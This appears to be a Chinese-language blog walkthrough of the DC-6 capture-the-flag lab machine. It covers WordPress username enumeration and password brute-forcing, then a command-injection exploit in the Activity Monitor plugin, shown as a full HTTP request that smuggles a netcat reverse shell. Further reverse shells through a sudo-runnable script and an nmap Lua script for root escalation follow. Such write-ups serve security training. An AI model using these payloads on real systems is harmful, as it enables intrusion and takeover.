DC-6渗透实战

好久没打渗透了，手段忘了不少，最近都在干嘛，自己也不知道，也不能说，哈哈!
是时候拿出练练手了

靶机IP：192.168.8.159
修改host：

192.168.8.159 wordy

nmap全扫

image.png

也是基本的常规渗透

web渗透

image.png

又是一个wordpress

常规操作

探测站点管理员用户名：

http://wordy/?author=n

n从1至5都能爆出用户名m，分别为：

1--admin
2--graham
3--mark
4--sarah
5--jens

在靶机官网处，作者给出了提示

image.png

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ;-)

生成字典

将上述爆出的五个用户名写入username字典中

根据提示生成相应的密码字典

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords

image.png

后台爆破

用burp爆破，爆了好久

image.png

得到一个登陆口令

mark   helpdesk01

登陆后台

image.png

看来没什么权限

发现了这个 Activity管理插件，可以以admin身份监视后台登录情况

image.png

通过搜索发现该插件是存在着命令执行漏洞

image.png

远程攻击者可通过向
url“/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools”发送精心构造的“ip”参数来利用该漏洞。此漏洞的成功利用需要特权，但是存有该漏洞的插件版本也易受到CSRF攻击和基于反射的XSS攻击，结合三个漏洞，通过诱导管理员点击恶意链接最终可以导致远程命令执行。

受影响的版本
Plainview Activity Monitor plugin version <= 20161228

getshell

在kali中search一下该插件的poc

searchsploit activity

image.png

可以看到是CSRF漏洞

查看该poc，给出了poc的GitHub地址

https://github.com/aas-n/CVE/tree/master/CVE-2018-15877

经过测试，其实触发该漏洞的触发点在如下图所示

image.png

用burp抓取该POST数据包，写入nc反弹一句话

nc 192.168.8.253 4444 -e /bin/bash

POST /wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools HTTP/1.1
Host: wordy
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools
Content-Type: multipart/form-data; boundary=---------------------------10346177832391
Content-Length: 282
Cookie: wordpress_14014489b649086e51cacb340bafe656=mark%7C1559472991%7CKfa6geY3JShfhuvXYEyxMKtIN0nuZumOd09zbJRNRno%7Cd3e5f20d369d5422dea75189e0fea7cfa7a36e355171dd311ca9e7121ca81ddd; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_14014489b649086e51cacb340bafe656=mark%7C1559472991%7CKfa6geY3JShfhuvXYEyxMKtIN0nuZumOd09zbJRNRno%7C4554e1935c4a639ab756023d04f6e56c066d2a6f29b2bc10c9cb14acf2685045; wp-settings-3=mfold%3Do; wp-settings-time-3=1559300197
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------10346177832391
Content-Disposition: form-data; name="ip"

test | nc 192.168.8.253 4444 -e /bin/bash
-----------------------------10346177832391
Content-Disposition: form-data; name="lookup"

Lookup
-----------------------------10346177832391--

kali中开启nc监听

nc -lvp 4444

image.png

拿到shell

提权

image.png

看到系统版本这么新，应该没有什么漏洞

一通乱翻，发现home目录下的用户文件夹中，有个小tip

image.png

Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

估计添加了一个账户

graham - GSo7isUM1D4

应该能登录

尝试登录ssh

登录ssh

ssh graham@wordy

image.png

登录成功

在home下发现了jens用户下有个sh脚本

image.png

#!/bin/bash
tar -czf backups.tar.gz /var/www/html

jens用户反弹

哈哈，常规操作，可用来提权

sudo -l

查看下权限，发现jens用户可以执行该sh

image.png

在该sh脚本中写入nc 连接一句话连接kali

nc 192.168.8.253 9999 -e /bin/bash

然后再以jens用户的权限执行它

sudo -u jens /home/jens/backups.sh

反弹回kali的shell是jens用户的

image.png

get root

拿到jens用户的shell后，查看其权限

image.png

发现能以root用户免密码执行nmap

可以借此提权

查看其它大牛的提示，写个nmap的脚本，root权限执行，进行提权

echo 'os.execute("/bin/sh")' > root.nse

将其保存为.nse格式，如下图

image.png

之后sudo执行该nmap脚本，

sudo nmap --script=/home/jens/root.nse

image.png

get root 成功

get flag

image.png

总结

最近也在备考啦！
然后该靶机就是一个常规的CTF
1、wordpress后台爆破。登录后台，没有写shell的权限
2、找到相关的插件漏洞，拿shell
3、进入ssh，对可执行的文件、脚本特别注意，可以进行提权

靶机百度云下载
链接：https://pan.baidu.com/s/1WiZOiau6EGu6MtEHSRRCog
提取码：kqfk